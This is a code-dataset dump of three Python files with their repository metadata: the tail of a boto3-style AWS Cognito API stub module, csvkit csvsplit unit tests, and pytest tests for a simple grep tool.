Responds to the authentication challenge.
See also: AWS API Documentation
:example: response = client.respond_to_auth_challenge(
ClientId='string',
ChallengeName='SMS_MFA'|'PASSWORD_VERIFIER'|'CUSTOM_CHALLENGE'|'DEVICE_SRP_AUTH'|'DEVICE_PASSWORD_VERIFIER'|'ADMIN_NO_SRP_AUTH'|'NEW_PASSWORD_REQUIRED',
Session='string',
ChallengeResponses={
'string': 'string'
}
)
:type ClientId: string
:param ClientId: [REQUIRED]
The app client ID.
:type ChallengeName: string
:param ChallengeName: [REQUIRED]
The challenge name. For more information, see InitiateAuth .
ADMIN_NO_SRP_AUTH is not a valid value.
:type Session: string
:param Session: The session which should be passed both ways in challenge-response calls to the service. If InitiateAuth or RespondToAuthChallenge API call determines that the caller needs to go through another challenge, they return a session with other challenge parameters. This session should be passed as it is to the next RespondToAuthChallenge API call.
:type ChallengeResponses: dict
:param ChallengeResponses: The challenge responses. These are inputs corresponding to the value of ChallengeName , for example:
SMS_MFA : SMS_MFA_CODE , USERNAME , SECRET_HASH (if app client is configured with client secret).
PASSWORD_VERIFIER : PASSWORD_CLAIM_SIGNATURE , PASSWORD_CLAIM_SECRET_BLOCK , TIMESTAMP , USERNAME , SECRET_HASH (if app client is configured with client secret).
NEW_PASSWORD_REQUIRED : NEW_PASSWORD , any other required attributes, USERNAME , SECRET_HASH (if app client is configured with client secret).
(string) --
(string) --
:rtype: dict
:return: {
'ChallengeName': 'SMS_MFA'|'PASSWORD_VERIFIER'|'CUSTOM_CHALLENGE'|'DEVICE_SRP_AUTH'|'DEVICE_PASSWORD_VERIFIER'|'ADMIN_NO_SRP_AUTH'|'NEW_PASSWORD_REQUIRED',
'Session': 'string',
'ChallengeParameters': {
'string': 'string'
},
'AuthenticationResult': {
'AccessToken': 'string',
'ExpiresIn': 123,
'TokenType': 'string',
'RefreshToken': 'string',
'IdToken': 'string',
'NewDeviceMetadata': {
'DeviceKey': 'string',
'DeviceGroupKey': 'string'
}
}
}
:returns:
(string) --
(string) --
"""
pass
def set_user_settings(AccessToken=None, MFAOptions=None):
"""
Sets the user settings like multi-factor authentication (MFA). If MFA is to be removed for a particular attribute pass the attribute with code delivery as null. If null list is passed, all MFA options are removed.
See also: AWS API Documentation
:example: response = client.set_user_settings(
AccessToken='string',
MFAOptions=[
{
'DeliveryMedium': 'SMS'|'EMAIL',
'AttributeName': 'string'
},
]
)
:type AccessToken: string
:param AccessToken: [REQUIRED]
The access token for the set user settings request.
:type MFAOptions: list
:param MFAOptions: [REQUIRED]
Specifies the options for MFA (e.g., email or phone number).
(dict) --Specifies the different settings for multi-factor authentication (MFA).
DeliveryMedium (string) --The delivery medium (email message or SMS message) to send the MFA code.
AttributeName (string) --The attribute name of the MFA option type.
:rtype: dict
:return: {}
"""
pass
def sign_up(ClientId=None, SecretHash=None, Username=None, Password=None, UserAttributes=None, ValidationData=None):
"""
Registers the user in the specified user pool and creates a user name, password, and user attributes.
See also: AWS API Documentation
:example: response = client.sign_up(
ClientId='string',
SecretHash='string',
Username='string',
Password='string',
UserAttributes=[
{
'Name': 'string',
'Value': 'string'
},
],
ValidationData=[
{
'Name': 'string',
'Value': 'string'
},
]
)
:type ClientId: string
:param ClientId: [REQUIRED]
The ID of the client associated with the user pool.
:type SecretHash: string
:param SecretHash: A keyed-hash message authentication code (HMAC) calculated using the secret key of a user pool client and username plus the client ID in the message.
:type Username: string
:param Username: [REQUIRED]
The user name of the user you wish to register.
:type Password: string
:param Password: [REQUIRED]
The password of the user you wish to register.
:type UserAttributes: list
:param UserAttributes: An array of name-value pairs representing user attributes.
For custom attributes, you must prepend the custom: prefix to the attribute name.
(dict) --Specifies whether the attribute is standard or custom.
Name (string) -- [REQUIRED]The name of the attribute.
Value (string) --The value of the attribute.
:type ValidationData: list
:param ValidationData: The validation data in the request to register a user.
(dict) --Specifies whether the attribute is standard or custom.
Name (string) -- [REQUIRED]The name of the attribute.
Value (string) --The value of the attribute.
:rtype: dict
:return: {
'UserConfirmed': True|False,
'CodeDeliveryDetails': {
'Destination': 'string',
'DeliveryMedium': 'SMS'|'EMAIL',
'AttributeName': 'string'
},
'UserSub': 'string'
}
"""
pass
def start_user_import_job(UserPoolId=None, JobId=None):
"""
Starts the user import.
See also: AWS API Documentation
:example: response = client.start_user_import_job(
UserPoolId='string',
JobId='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool that the users are being imported into.
:type JobId: string
:param JobId: [REQUIRED]
The job ID for the user import job.
:rtype: dict
:return: {
'UserImportJob': {
'JobName': 'string',
'JobId': 'string',
'UserPoolId': 'string',
'PreSignedUrl': 'string',
'CreationDate': datetime(2015, 1, 1),
'StartDate': datetime(2015, 1, 1),
'CompletionDate': datetime(2015, 1, 1),
'Status': 'Created'|'Pending'|'InProgress'|'Stopping'|'Expired'|'Stopped'|'Failed'|'Succeeded',
'CloudWatchLogsRoleArn': 'string',
'ImportedUsers': 123,
'SkippedUsers': 123,
'FailedUsers': 123,
'CompletionMessage': 'string'
}
}
:returns:
Created - The job was created but not started.
Pending - A transition state. You have started the job, but it has not begun importing users yet.
InProgress - The job has started, and users are being imported.
Stopping - You have stopped the job, but the job has not stopped importing users yet.
Stopped - You have stopped the job, and the job has stopped importing users.
Succeeded - The job has completed successfully.
Failed - The job has stopped due to an error.
Expired - You created a job, but did not start the job within 24-48 hours. All data associated with the job was deleted, and the job cannot be started.
"""
pass
def stop_user_import_job(UserPoolId=None, JobId=None):
"""
Stops the user import job.
See also: AWS API Documentation
:example: response = client.stop_user_import_job(
UserPoolId='string',
JobId='string'
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool that the users are being imported into.
:type JobId: string
:param JobId: [REQUIRED]
The job ID for the user import job.
:rtype: dict
:return: {
'UserImportJob': {
'JobName': 'string',
'JobId': 'string',
'UserPoolId': 'string',
'PreSignedUrl': 'string',
'CreationDate': datetime(2015, 1, 1),
'StartDate': datetime(2015, 1, 1),
'CompletionDate': datetime(2015, 1, 1),
'Status': 'Created'|'Pending'|'InProgress'|'Stopping'|'Expired'|'Stopped'|'Failed'|'Succeeded',
'CloudWatchLogsRoleArn': 'string',
'ImportedUsers': 123,
'SkippedUsers': 123,
'FailedUsers': 123,
'CompletionMessage': 'string'
}
}
:returns:
Created - The job was created but not started.
Pending - A transition state. You have started the job, but it has not begun importing users yet.
InProgress - The job has started, and users are being imported.
Stopping - You have stopped the job, but the job has not stopped importing users yet.
Stopped - You have stopped the job, and the job has stopped importing users.
Succeeded - The job has completed successfully.
Failed - The job has stopped due to an error.
Expired - You created a job, but did not start the job within 24-48 hours. All data associated with the job was deleted, and the job cannot be started.
"""
pass
def update_device_status(AccessToken=None, DeviceKey=None, DeviceRememberedStatus=None):
"""
Updates the device status.
See also: AWS API Documentation
:example: response = client.update_device_status(
AccessToken='string',
DeviceKey='string',
DeviceRememberedStatus='remembered'|'not_remembered'
)
:type AccessToken: string
:param AccessToken: [REQUIRED]
The access token.
:type DeviceKey: string
:param DeviceKey: [REQUIRED]
The device key.
:type DeviceRememberedStatus: string
:param DeviceRememberedStatus: The status of whether a device is remembered.
:rtype: dict
:return: {}
"""
pass
def update_group(GroupName=None, UserPoolId=None, Description=None, RoleArn=None, Precedence=None):
"""
Updates the specified group with the specified attributes.
Requires developer credentials.
See also: AWS API Documentation
:example: response = client.update_group(
GroupName='string',
UserPoolId='string',
Description='string',
RoleArn='string',
Precedence=123
)
:type GroupName: string
:param GroupName: [REQUIRED]
The name of the group.
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool.
:type Description: string
:param Description: A string containing the new description of the group.
:type RoleArn: string
:param RoleArn: The new role ARN for the group. This is used for setting the cognito:roles and cognito:preferred_role claims in the token.
:type Precedence: integer
:param Precedence: The new precedence value for the group. For more information about this parameter, see CreateGroup .
:rtype: dict
:return: {
'Group': {
'GroupName': 'string',
'UserPoolId': 'string',
'Description': 'string',
'RoleArn': 'string',
'Precedence': 123,
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1)
}
}
"""
pass
def update_identity_provider(UserPoolId=None, ProviderName=None, ProviderDetails=None, AttributeMapping=None, IdpIdentifiers=None):
"""
Updates identity provider information for a user pool.
See also: AWS API Documentation
:example: response = client.update_identity_provider(
UserPoolId='string',
ProviderName='string',
ProviderDetails={
'string': 'string'
},
AttributeMapping={
'string': 'string'
},
IdpIdentifiers=[
'string',
]
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID.
:type ProviderName: string
:param ProviderName: [REQUIRED]
The identity provider name.
:type ProviderDetails: dict
:param ProviderDetails: The identity provider details to be updated, such as MetadataURL and MetadataFile .
(string) --
(string) --
:type AttributeMapping: dict
:param AttributeMapping: The identity provider attribute mapping to be changed.
(string) --
(string) --
:type IdpIdentifiers: list
:param IdpIdentifiers: A list of identity provider identifiers.
(string) --
:rtype: dict
:return: {
'IdentityProvider': {
'UserPoolId': 'string',
'ProviderName': 'string',
'ProviderType': 'SAML',
'ProviderDetails': {
'string': 'string'
},
'AttributeMapping': {
'string': 'string'
},
'IdpIdentifiers': [
'string',
],
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1)
}
}
:returns:
(string) --
(string) --
"""
pass
def update_user_attributes(UserAttributes=None, AccessToken=None):
"""
Allows a user to update a specific attribute (one at a time).
See also: AWS API Documentation
:example: response = client.update_user_attributes(
UserAttributes=[
{
'Name': 'string',
'Value': 'string'
},
],
AccessToken='string'
)
:type UserAttributes: list
:param UserAttributes: [REQUIRED]
An array of name-value pairs representing user attributes.
For custom attributes, you must prepend the custom: prefix to the attribute name.
(dict) --Specifies whether the attribute is standard or custom.
Name (string) -- [REQUIRED]The name of the attribute.
Value (string) --The value of the attribute.
:type AccessToken: string
:param AccessToken: [REQUIRED]
The access token for the request to update user attributes.
:rtype: dict
:return: {
'CodeDeliveryDetailsList': [
{
'Destination': 'string',
'DeliveryMedium': 'SMS'|'EMAIL',
'AttributeName': 'string'
},
]
}
"""
pass
def update_user_pool(UserPoolId=None, Policies=None, LambdaConfig=None, AutoVerifiedAttributes=None, SmsVerificationMessage=None, EmailVerificationMessage=None, EmailVerificationSubject=None, SmsAuthenticationMessage=None, MfaConfiguration=None, DeviceConfiguration=None, EmailConfiguration=None, SmsConfiguration=None, UserPoolTags=None, AdminCreateUserConfig=None):
"""
Updates the specified user pool with the specified attributes.
See also: AWS API Documentation
:example: response = client.update_user_pool(
UserPoolId='string',
Policies={
'PasswordPolicy': {
'MinimumLength': 123,
'RequireUppercase': True|False,
'RequireLowercase': True|False,
'RequireNumbers': True|False,
'RequireSymbols': True|False
}
},
LambdaConfig={
'PreSignUp': 'string',
'CustomMessage': 'string',
'PostConfirmation': 'string',
'PreAuthentication': 'string',
'PostAuthentication': 'string',
'DefineAuthChallenge': 'string',
'CreateAuthChallenge': 'string',
'VerifyAuthChallengeResponse': 'string'
},
AutoVerifiedAttributes=[
'phone_number'|'email',
],
SmsVerificationMessage='string',
EmailVerificationMessage='string',
EmailVerificationSubject='string',
SmsAuthenticationMessage='string',
MfaConfiguration='OFF'|'ON'|'OPTIONAL',
DeviceConfiguration={
'ChallengeRequiredOnNewDevice': True|False,
'DeviceOnlyRememberedOnUserPrompt': True|False
},
EmailConfiguration={
'SourceArn': 'string',
'ReplyToEmailAddress': 'string'
},
SmsConfiguration={
'SnsCallerArn': 'string',
'ExternalId': 'string'
},
UserPoolTags={
'string': 'string'
},
AdminCreateUserConfig={
'AllowAdminCreateUserOnly': True|False,
'UnusedAccountValidityDays': 123,
'InviteMessageTemplate': {
'SMSMessage': 'string',
'EmailMessage': 'string',
'EmailSubject': 'string'
}
}
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool you want to update.
:type Policies: dict
:param Policies: A container with the policies you wish to update in a user pool.
PasswordPolicy (dict) --A container for information about the user pool password policy.
MinimumLength (integer) --The minimum length of the password policy that you have set. Cannot be less than 6.
RequireUppercase (boolean) --In the password policy that you have set, refers to whether you have required users to use at least one uppercase letter in their password.
RequireLowercase (boolean) --In the password policy that you have set, refers to whether you have required users to use at least one lowercase letter in their password.
RequireNumbers (boolean) --In the password policy that you have set, refers to whether you have required users to use at least one number in their password.
RequireSymbols (boolean) --In the password policy that you have set, refers to whether you have required users to use at least one symbol in their password.
:type LambdaConfig: dict
:param LambdaConfig: The AWS Lambda configuration information from the request to update the user pool.
PreSignUp (string) --A pre-registration AWS Lambda trigger.
CustomMessage (string) --A custom Message AWS Lambda trigger.
PostConfirmation (string) --A post-confirmation AWS Lambda trigger.
PreAuthentication (string) --A pre-authentication AWS Lambda trigger.
PostAuthentication (string) --A post-authentication AWS Lambda trigger.
DefineAuthChallenge (string) --Defines the authentication challenge.
CreateAuthChallenge (string) --Creates an authentication challenge.
VerifyAuthChallengeResponse (string) --Verifies the authentication challenge response.
:type AutoVerifiedAttributes: list
:param AutoVerifiedAttributes: The attributes that are automatically verified when the Amazon Cognito service makes a request to update user pools.
(string) --
:type SmsVerificationMessage: string
:param SmsVerificationMessage: A container with information about the SMS verification message.
:type EmailVerificationMessage: string
:param EmailVerificationMessage: The contents of the email verification message.
:type EmailVerificationSubject: string
:param EmailVerificationSubject: The subject of the email verification message.
:type SmsAuthenticationMessage: string
:param SmsAuthenticationMessage: The contents of the SMS authentication message.
:type MfaConfiguration: string
:param MfaConfiguration: Can be one of the following values:
OFF - MFA tokens are not required and cannot be specified during user registration.
ON - MFA tokens are required for all user registrations. You can only specify required when you are initially creating a user pool.
OPTIONAL - Users have the option when registering to create an MFA token.
:type DeviceConfiguration: dict
:param DeviceConfiguration: Device configuration.
ChallengeRequiredOnNewDevice (boolean) --Indicates whether a challenge is required on a new device. Only applicable to a new device.
DeviceOnlyRememberedOnUserPrompt (boolean) --If true, a device is only remembered on user prompt.
:type EmailConfiguration: dict
:param EmailConfiguration: Email configuration.
SourceArn (string) --The Amazon Resource Name (ARN) of the email source.
ReplyToEmailAddress (string) --The REPLY-TO email address.
:type SmsConfiguration: dict
:param SmsConfiguration: SMS configuration.
SnsCallerArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) of the Amazon Simple Notification Service (SNS) caller.
ExternalId (string) --The external ID.
:type UserPoolTags: dict
:param UserPoolTags: The cost allocation tags for the user pool. For more information, see Adding Cost Allocation Tags to Your User Pool
(string) --
(string) --
:type AdminCreateUserConfig: dict
:param AdminCreateUserConfig: The configuration for AdminCreateUser requests.
AllowAdminCreateUserOnly (boolean) --Set to True if only the administrator is allowed to create user profiles. Set to False if users can sign themselves up via an app.
UnusedAccountValidityDays (integer) --The user account expiration limit, in days, after which the account is no longer usable. To reset the account after that time limit, you must call AdminCreateUser again, specifying 'RESEND' for the MessageAction parameter. The default value for this parameter is 7.
InviteMessageTemplate (dict) --The message template to be used for the welcome message to new users.
SMSMessage (string) --The message template for SMS messages.
EmailMessage (string) --The message template for email messages.
EmailSubject (string) --The subject line for email messages.
:rtype: dict
:return: {}
"""
pass
def update_user_pool_client(UserPoolId=None, ClientId=None, ClientName=None, RefreshTokenValidity=None, ReadAttributes=None, WriteAttributes=None, ExplicitAuthFlows=None, SupportedIdentityProviders=None, CallbackURLs=None, LogoutURLs=None, DefaultRedirectURI=None, AllowedOAuthFlows=None, AllowedOAuthScopes=None, AllowedOAuthFlowsUserPoolClient=None):
"""
Allows the developer to update the specified user pool client and password policy.
See also: AWS API Documentation
:example: response = client.update_user_pool_client(
UserPoolId='string',
ClientId='string',
ClientName='string',
RefreshTokenValidity=123,
ReadAttributes=[
'string',
],
WriteAttributes=[
'string',
],
ExplicitAuthFlows=[
'ADMIN_NO_SRP_AUTH'|'CUSTOM_AUTH_FLOW_ONLY',
],
SupportedIdentityProviders=[
'string',
],
CallbackURLs=[
'string',
],
LogoutURLs=[
'string',
],
DefaultRedirectURI='string',
AllowedOAuthFlows=[
'code'|'implicit'|'client_credentials',
],
AllowedOAuthScopes=[
'string',
],
AllowedOAuthFlowsUserPoolClient=True|False
)
:type UserPoolId: string
:param UserPoolId: [REQUIRED]
The user pool ID for the user pool where you want to update the user pool client.
:type ClientId: string
:param ClientId: [REQUIRED]
The ID of the client associated with the user pool.
:type ClientName: string
:param ClientName: The client name from the update user pool client request.
:type RefreshTokenValidity: integer
:param RefreshTokenValidity: The time limit, in days, after which the refresh token is no longer valid and cannot be used.
:type ReadAttributes: list
:param ReadAttributes: The read-only attributes of the user pool.
(string) --
:type WriteAttributes: list
:param WriteAttributes: The writeable attributes of the user pool.
(string) --
:type ExplicitAuthFlows: list
:param ExplicitAuthFlows: Explicit authentication flows.
(string) --
:type SupportedIdentityProviders: list
:param SupportedIdentityProviders: A list of provider names for the identity providers that are supported on this client.
(string) --
:type CallbackURLs: list
:param CallbackURLs: A list of allowed callback URLs for the identity providers.
(string) --
:type LogoutURLs: list
:param LogoutURLs: A list ofallowed logout URLs for the identity providers.
(string) --
:type DefaultRedirectURI: string
:param DefaultRedirectURI: The default redirect URI. Must be in the CallbackURLs list.
:type AllowedOAuthFlows: list
:param AllowedOAuthFlows: Set to code to initiate a code grant flow, which provides an authorization code as the response. This code can be exchanged for access tokens with the token endpoint.
Set to token to specify that the client should get the access token (and, optionally, ID token, based on scopes) directly.
(string) --
:type AllowedOAuthScopes: list
:param AllowedOAuthScopes: A list of allowed OAuth scopes. Currently supported values are 'phone' , 'email' , 'openid' , and 'Cognito' .
(string) --
:type AllowedOAuthFlowsUserPoolClient: boolean
:param AllowedOAuthFlowsUserPoolClient: Set to TRUE if the client is allowed to follow the OAuth protocol when interacting with Cognito user pools.
:rtype: dict
:return: {
'UserPoolClient': {
'UserPoolId': 'string',
'ClientName': 'string',
'ClientId': 'string',
'ClientSecret': 'string',
'LastModifiedDate': datetime(2015, 1, 1),
'CreationDate': datetime(2015, 1, 1),
'RefreshTokenValidity': 123,
'ReadAttributes': [
'string',
],
'WriteAttributes': [
'string',
],
'ExplicitAuthFlows': [
'ADMIN_NO_SRP_AUTH'|'CUSTOM_AUTH_FLOW_ONLY',
],
'SupportedIdentityProviders': [
'string',
],
'CallbackURLs': [
'string',
],
'LogoutURLs': [
'string',
],
'DefaultRedirectURI': 'string',
'AllowedOAuthFlows': [
'code'|'implicit'|'client_credentials',
],
'AllowedOAuthScopes': [
'string',
],
'AllowedOAuthFlowsUserPoolClient': True|False
}
}
:returns:
(string) --
"""
pass
def verify_user_attribute(AccessToken=None, AttributeName=None, Code=None):
"""
Verifies the specified user attributes in the user pool.
See also: AWS API Documentation
:example: response = client.verify_user_attribute(
AccessToken='string',
AttributeName='string',
Code='string'
)
:type AccessToken: string
:param AccessToken: [REQUIRED]
Represents the access token of the request to verify user attributes.
:type AttributeName: string
:param AttributeName: [REQUIRED]
The attribute name in the request to verify user attributes.
:type Code: string
:param Code: [REQUIRED]
The verification code in the request to verify user attributes.
:rtype: dict
:return: {}
"""
pass
| 33.325024
| 625
| 0.60243
| 13,953
| 137,699
| 5.897585
| 0.062926
| 0.017864
| 0.015239
| 0.011691
| 0.820231
| 0.784989
| 0.757185
| 0.735469
| 0.716912
| 0.691259
| 0
| 0.006313
| 0.317795
| 137,699
| 4,131
| 626
| 33.333091
| 0.869671
| 0.833158
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.538462
| 0.032051
| 0
| 0.532051
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 9
|
329b29b0fee4c641e2cfc32de5e4769e6c60dc51
| 4,060
|
py
|
Python
|
tests/test_utilities/test_csvsplit.py
|
themiurgo/csvkit
|
d03fb24c9b35d6cac77881b71c794ff6274356a3
|
[
"MIT"
] | 2
|
2016-01-24T22:10:19.000Z
|
2017-01-10T10:43:13.000Z
|
tests/test_utilities/test_csvsplit.py
|
themiurgo/csvkit
|
d03fb24c9b35d6cac77881b71c794ff6274356a3
|
[
"MIT"
] | null | null | null |
tests/test_utilities/test_csvsplit.py
|
themiurgo/csvkit
|
d03fb24c9b35d6cac77881b71c794ff6274356a3
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import StringIO
import unittest
from csvkit import CSVKitReader
from csvkit.utilities.csvsplit import CSVSplit, fname_format
class DummyFiles(object):
def __init__(self):
self.file_objs = {}
def dummy_file_constructor(self, fname, mode, *args, **kwargs):
fobj = StringIO.StringIO()
self.file_objs[fname] = fobj
return fobj
class TestCSVSplit(unittest.TestCase):
def test_fname(self):
output_fname = fname_format("data/population.projection.csv", "2009")
self.assertEqual(output_fname, "data/population.projection_2009.csv")
def test_explicit_splitting(self):
# Split a file in two files
args = ['-c', 'foo', 'examples/dummy-stacked.csv']
utility = CSVSplit(args)
dummy_files = DummyFiles()
utility.main(dummy_files.dummy_file_constructor)
print dummy_files.file_objs
input_file = StringIO.StringIO(dummy_files.file_objs['examples/dummy-stacked_asd.csv'].getvalue())
reader = CSVKitReader(input_file)
self.assertEqual(reader.next(), ['foo', 'a', 'b', 'c'])
self.assertEqual(reader.next(), ['asd', '1', '2', '3'])
self.assertEqual(reader.next(), ['asd', '4', '5', '6'])
input_file = StringIO.StringIO(dummy_files.file_objs['examples/dummy-stacked_sdf.csv'].getvalue())
reader = CSVKitReader(input_file)
self.assertEqual(reader.next(), ['foo', 'a', 'b', 'c'])
self.assertEqual(reader.next(), ['sdf', '1', '2', '3'])
self.assertEqual(reader.next(), ['sdf', '4', '5', '6'])
def test_no_header_row(self):
# Split a no header file in two files
args = ['-c', '1', '--no-header-row', 'examples/dummy-stacked.csv']
utility = CSVSplit(args)
dummy_files = DummyFiles()
utility.main(dummy_files.dummy_file_constructor)
print dummy_files.file_objs
input_file = StringIO.StringIO(dummy_files.file_objs['examples/dummy-stacked_foo.csv'].getvalue())
reader = CSVKitReader(input_file)
self.assertEqual(reader.next(), ['foo', 'a', 'b', 'c'])
input_file = StringIO.StringIO(dummy_files.file_objs['examples/dummy-stacked_asd.csv'].getvalue())
reader = CSVKitReader(input_file)
self.assertEqual(reader.next(), ['asd', '1', '2', '3'])
self.assertEqual(reader.next(), ['asd', '4', '5', '6'])
input_file = StringIO.StringIO(dummy_files.file_objs['examples/dummy-stacked_sdf.csv'].getvalue())
reader = CSVKitReader(input_file)
self.assertEqual(reader.next(), ['sdf', '1', '2', '3'])
self.assertEqual(reader.next(), ['sdf', '4', '5', '6'])
# def test_stdin(self):
# # Split a no file from stdin in two files
# args = ['-c', '1']
# utility = CSVSplit(args)
# dummy_files = DummyFiles()
# # assert that raises an error utility.main(dummy_files.dummy_file_constructor)
# #print dummy_files.file_objs
# # Split a no file from stdin in two files
# args = ['-c', '1' '-o' ['splitted.csv']]
# utility = CSVSplit(args)
# dummy_files = DummyFiles()
# assert that raises an error utility.main(dummy_files.dummy_file_constructor)
# input_file = StringIO.StringIO(dummy_files.file_objs[('examples/dummy-stacked_foo.csv')].getvalue())
# reader = CSVKitReader(input_file)
# self.assertEqual(reader.next(), ['foo', 'a', 'b', 'c'])
# input_file = StringIO.StringIO(dummy_files.file_objs[('examples/dummy-stacked_asd.csv')].getvalue())
# reader = CSVKitReader(input_file)
# self.assertEqual(reader.next(), ['asd', '1', '2', '3'])
# self.assertEqual(reader.next(), ['asd', '4', '5', '6'])
# input_file = StringIO.StringIO(dummy_files.file_objs[('examples/dummy-stacked_sdf.csv')].getvalue())
# reader = CSVKitReader(input_file)
# self.assertEqual(reader.next(), ['sdf', '1', '2', '3'])
# self.assertEqual(reader.next(), ['sdf', '4', '5', '6'])
| 41.428571
| 110
| 0.625369
| 496
| 4,060
| 4.953629
| 0.155242
| 0.07733
| 0.136752
| 0.1628
| 0.789174
| 0.789174
| 0.773301
| 0.77208
| 0.77208
| 0.77208
| 0
| 0.014614
| 0.207882
| 4,060
| 97
| 111
| 41.85567
| 0.749378
| 0.310837
| 0
| 0.583333
| 0
| 0
| 0.130105
| 0.096494
| 0
| 0
| 0
| 0
| 0.25
| 0
| null | null | 0
| 0.083333
| null | null | 0.041667
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
32c7d89787386bcd601ca37279ebb900dce6021f
| 4,515
|
py
|
Python
|
tests/test_grep_edge_cases.py
|
florianbegusch/simple_grep
|
62fd0f76383e2332c5308e7961ce6f585c2a8208
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_grep_edge_cases.py
|
florianbegusch/simple_grep
|
62fd0f76383e2332c5308e7961ce6f585c2a8208
|
[
"BSD-2-Clause"
] | 2
|
2020-06-19T20:18:12.000Z
|
2020-06-19T20:18:50.000Z
|
tests/test_grep_edge_cases.py
|
florianbegusch/simple_grep
|
62fd0f76383e2332c5308e7961ce6f585c2a8208
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import platform
import pytest
from grep import print_helper
from grep import file_helper
from grep.grep import Searcher
from tests.helper_for_tests import *
def test_run_with_empty_str_not_regex_line_by_line(with_f_write):
with_f_write.write('docopt\nasdfwer')
with_f_write.seek(0)
caller_dir = os.path.dirname(with_f_write.name)
search_term = ''
is_regex_pattern = False
is_search_line_by_line = True
matched_files = Searcher.run(
Searcher(
caller_dir=caller_dir,
search_term=search_term,
specific_file='',
is_recursive=False,
is_abs_path=False,
is_regex_pattern=is_regex_pattern,
is_search_line_by_line=is_search_line_by_line,
is_from_stdin=False))
assert matched_files == [os.path.abspath(with_f_write.name)]
def test_run_with_empty_str_is_regex_line_by_line(with_f_write):
with_f_write.write('docopt\nasdfwer')
with_f_write.seek(0)
caller_dir = os.path.dirname(with_f_write.name)
search_term = ''
is_regex_pattern = True
is_search_line_by_line = True
matched_files = Searcher.run(
Searcher(
caller_dir=caller_dir,
search_term=search_term,
specific_file='',
is_recursive=False,
is_abs_path=False,
is_regex_pattern=is_regex_pattern,
is_search_line_by_line=is_search_line_by_line,
is_from_stdin=False))
assert matched_files == [os.path.abspath(with_f_write.name)]
def test_run_with_empty_str_not_regex_file_level(with_f_write):
    """An empty plain-text search term matches the file in whole-file mode."""
    with_f_write.write('docopt\nasdfwer')
    with_f_write.seek(0)
    searcher = Searcher(
        caller_dir=os.path.dirname(with_f_write.name),
        search_term="",
        specific_file='',
        is_recursive=False,
        is_abs_path=False,
        is_regex_pattern=False,
        is_search_line_by_line=False,
        is_from_stdin=False)
    assert searcher.run() == [os.path.abspath(with_f_write.name)]
def test_run_with_empty_str_is_regex_file_level(with_f_write):
    """An empty regex search term matches the file in whole-file mode."""
    with_f_write.write('docopt\nasdfwer')
    with_f_write.seek(0)
    searcher = Searcher(
        caller_dir=os.path.dirname(with_f_write.name),
        search_term="",
        specific_file='',
        is_recursive=False,
        is_abs_path=False,
        is_regex_pattern=True,
        is_search_line_by_line=False,
        is_from_stdin=False)
    assert searcher.run() == [os.path.abspath(with_f_write.name)]
@pytest.mark.skipif("platform.system() == 'Windows'")
def test_ioerror_due_to_restricted_file(with_restricted_file):
    """Searching a directory that contains an unreadable file must not raise.

    Skipped on Windows, where the POSIX permission fixture does not apply.
    """
    Searcher(
        caller_dir=with_restricted_file,
        search_term="",
        specific_file='',
        is_recursive=False,
        is_abs_path=False,
        is_regex_pattern=False,
        is_search_line_by_line=True,
        is_from_stdin=False).run()
def test_regular_expression_error_file_level(with_f_read):
    """An invalid regular expression ("[\\]") is handled gracefully in whole-file mode."""
    searcher = Searcher(
        caller_dir='',
        specific_file='',
        search_term="[\\]",
        is_recursive=False,
        is_abs_path=False,
        is_regex_pattern=True,
        is_search_line_by_line=False,
        is_from_stdin=False)
    searcher.search_f(with_f_read.name)
def test_regular_expression_error_line_by_line(with_f_read):
    """An invalid regular expression ("[\\]") is handled gracefully line by line."""
    # Directory option is irrelevant for the test.
    searcher = Searcher(
        caller_dir='',
        search_term="[\\]",
        specific_file='',
        is_recursive=False,
        is_abs_path=False,
        is_regex_pattern=True,
        is_search_line_by_line=True,
        is_from_stdin=False)
    searcher.search_f(with_f_read.name)
| 29.129032
| 65
| 0.66268
| 615
| 4,515
| 4.364228
| 0.108943
| 0.044709
| 0.081967
| 0.099106
| 0.86699
| 0.831222
| 0.81073
| 0.81073
| 0.800298
| 0.786513
| 0
| 0.001494
| 0.258915
| 4,515
| 154
| 66
| 29.318182
| 0.800658
| 0.014618
| 0
| 0.836066
| 0
| 0
| 0.022042
| 0
| 0
| 0
| 0
| 0
| 0.032787
| 1
| 0.057377
| false
| 0
| 0.057377
| 0
| 0.114754
| 0.008197
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
08bb6c3aefb4bb5f1466e06b61fb131352718118
| 154
|
py
|
Python
|
oop/inheritance/email_enable_contact.py
|
erzhiqianyi/Design-Patterns-In-Python
|
2c4ab70963dc339361c7adc34317d0cb966710cc
|
[
"Apache-2.0"
] | null | null | null |
oop/inheritance/email_enable_contact.py
|
erzhiqianyi/Design-Patterns-In-Python
|
2c4ab70963dc339361c7adc34317d0cb966710cc
|
